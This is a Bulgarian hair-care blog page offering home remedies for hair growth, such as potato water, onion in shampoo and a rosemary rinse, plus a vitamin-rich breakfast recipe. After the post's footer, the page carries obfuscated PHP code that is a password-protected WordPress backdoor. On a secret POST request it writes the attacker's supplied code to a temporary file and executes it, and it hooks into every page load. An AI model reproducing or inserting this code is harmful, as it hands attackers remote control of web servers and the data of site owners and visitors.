Тайни за растеж на косата | Косопад

Тайни за растеж на косата

Предлагаме ви някои домашни начини, за да ускорите растежа на косата, като използвате съставки, които имате в кухнята си!

rastej-na-kosata

Картофена вода за растеж на косата

Когато варите картофи, те изхвърляйте водата. Оставете да изстине и изплакнете косата с нея. Смята се, че така косата расте по- бързо. Картофите съдържат нишесте, което дава повече обем на косата. Няма обаче научни сведения дали метода наистина действа. Но е лесно да се направи, така че няма да изгубите нищо.

Растеж на косата с лук

Нарежете лука и го сложете в шампоана. Оставете да престои 15 дни и използвайте шампоана редовно. Лукът е богат на сяра – много полезен за косата минерал. Не само засилва растежа, но и придава блясък на косата.

Отвара от розмарин за външна употреба

Тази билка редовно се среща в рецептите за коса. Сложете шепа розмарин във вряща вода. Оставете да изстине и се

розмарин

розмарин

мийте с тази отвара всеки ден. Това ще накара косата да расте, ще я направи дълга, блестяща и красива. Продължителната употреба на розмарин може да направи косата ви по- тъмна.

Закуска за здрава коса

Голяма част от грижите, които полагаме, за да имаме здрава коса, трябва да е свързана със здравословното хранене. Ето рецепта за закуска, която е богата на витамини, полезни за косата:

1 с.л. житен зародиш, 1 с.л. бирена мая, 1 с.л. лецитин от соя, 1 с.л. мед и едно кисело мляко. Смесете всички съставки в киселото мляко и яжте всеки ден преди закуска.

17. февруари 2014 19:38:41 от Надя Колева
Категории: Рецепти при косопад | Етикети: , , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}